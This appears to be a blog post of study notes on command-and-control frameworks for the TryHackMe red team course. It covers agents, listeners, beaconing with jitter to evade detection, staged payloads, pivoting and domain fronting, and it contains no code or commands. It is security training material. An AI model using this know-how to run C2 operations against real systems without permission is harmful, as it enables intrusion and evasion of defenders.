Introduction

We covered an introduction to C2 servers. We explained C2 agents, payloads and their types (staged vs stageless), Droppers, beacons in addition to C2 agents obfuscation methods. We also covered some of the popular C2 servers including but not limited to Metasploit, Powershell Empire, Armitage and Cobalt Strike. This was part of the TryHackMe red team pathway.

While trying to digest the various components of a C2 framework, it may be intimidating. However, they don’t have to be. In order to better understand what a C2 framework is at its most basic level, think of a Netcat listener (the C2 server) that is capable of handling many reverse shells calling back at once (C2 Agents). It’s a server but for reverse shells. Unlike Netcat, almost all C2 frameworks require a special payload generator. This is usually a feature that is built into the framework itself. For example, Metasploit is a C2 Framework that has its own payload generator, MSFVenom.

So what exactly makes C2 frameworks better than a normal Netcat listener? It seems like all someone needs to do is implement session management into Netcat, and you have the same thing? While this is true, C2 frameworks shine in their “Post Exploitation” features.

Understanding C2 Servers

A C2 Framework is essentially a system that allows an attacker (me, the operator) to communicate with and control multiple compromised victim machines. Think of it as a central hub for managing my operations. C2 servers are far more scalable and flexible than trying to manage numerous targets with individual Netcat sessions, which would quickly become unmanageable.

Here are the key components of a C2 setup:

  • C2 Server: This is my central hub where I plan and execute operations, create payloads (agents), and manage all communications with the victim machines.
  • Agents/Payloads: These are the pieces of software (like an .exe file or a PowerShell script) I create on the C2 server and deliver to the victim machines. Once executed, the agent communicates back to my C2 server, sending information and receiving commands.
  • Listeners: This is the component on my C2 server that’s constantly waiting to receive incoming connections (callbacks) from the agents on the victim machines. Without a listener, the agent can’t talk to me.
  • Beacons: These are the communication packets exchanged between the agents on the victims and my listener on the C2 server.

Evading Detection

Security solutions are always trying to spot malicious C2 communication. To evade detection, I use a couple of techniques:

  • Sleep Timers: Instead of continuous communication, my payloads send beacons to the C2 server at set intervals (e.g., every 5, 10, or 15 seconds).
  • Jitter: To make detection even harder, I introduce random delays between agent callbacks. This prevents a predictable communication pattern that antivirus software might flag. For example, an agent might communicate after 5 seconds, then 15 seconds, then 3 seconds.

Payload Types

Payloads can be delivered in a couple of ways:

  • Stageless Payloads: The entire payload is created on the C2 server and sent to the victim workstation to be executed all at once.
  • Staged Payloads: The payload is sent in parts. First, a small “dropper” is sent to the victim. Once executed, the dropper makes another callback to the C2 server to request and download the rest of the payload. Staged payloads are often more reliable for antivirus evasion.

Payloads can come in various formats, including executables (.exe), PowerShell scripts, HTA (HTML Application) files, Visual Basic scripts, and JavaScript files.

C2 Server Modules & Capabilities

C2 frameworks offer powerful modules for post-exploitation and pivoting:

  • Post-Exploitation Modules: These allow me to interact with a compromised victim, enabling actions like dumping hashes, dumping credentials, and performing lateral movement or further enumeration within the network.
  • Pivoting Modules: These are crucial for communicating with other parts of the network that might otherwise be inaccessible. If I compromise a machine in one subnet, pivoting allows me to reach machines in different, isolated subnets using techniques like SMB beaconing and SSH tunneling.

Making the C2 Server Public (Facing the Internet)

If my attack needs to be conducted externally to the target network, I need to make my C2 server accessible from the internet:

  • Domain Fronting: This involves setting up a domain and routing traffic through a proxy (like Cloudflare). The attack traffic then appears to originate from the proxy, providing some anonymity for my C2 server.
  • C2 Profiles: This is another technique for proxying communication with victims.

Examples of C2 Frameworks

I learned about several C2 frameworks, categorized by their availability:

  • Free/Open Source:
    • Metasploit: Primarily known for exploit development, but it can also function as a C2 server.
    • Armitage: A graphical user interface (GUI) front-end for Metasploit, offering more visual and automated features.
    • PowerShell Empire: Heavily relies on PowerShell (though now discontinued, it’s still encountered).
    • Covenant: Often used for pivoting and lateral movement.
    • Merlin/Silver: More advanced, allowing communication obfuscation through different protocols and encryption.
  • Paid/Commercial:
    • Cobalt Strike: A very prominent and powerful paid C2 server.
    • Brute Ratel: Provides an adversary emulation experience.

I also noted that there are websites where I can explore even more C2 frameworks.

Future Content

I plan to cover Armitage installation and usage in the next video, and potentially PowerShell Empire and Covenant in subsequent videos. I also have personal OneNote notes on red teaming, covering theory, methodologies, and career aspects.

Technical Commands

This video was purely conceptual, explaining the components and functionalities of C2 servers, so no specific technical commands were typed into a terminal. The examples given, like payload.exe, were illustrative names for files rather than commands to be executed.

TryHackMe Red Team Track Answers

 
What is the term for the software on a compromised computer that communicates back to a command and control (C2) server?
 

What is the beaconing option that introduces a random delay value to the sleep timer?

 

What is the term for the first portion of a Staged payload?

 

What is the name of the communication method that can potentially allow access to a restricted network segment that communicates via TCP ports 139 and 445?

Which listener should you choose if you have a device that cannot easily access the internet?
 

Which listener should you choose if you’re accessing a restricted network segment?

 

Which listener should you choose if you are dealing with a Firewall that does protocol inspection?

 

Video Walkthrough(s)

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles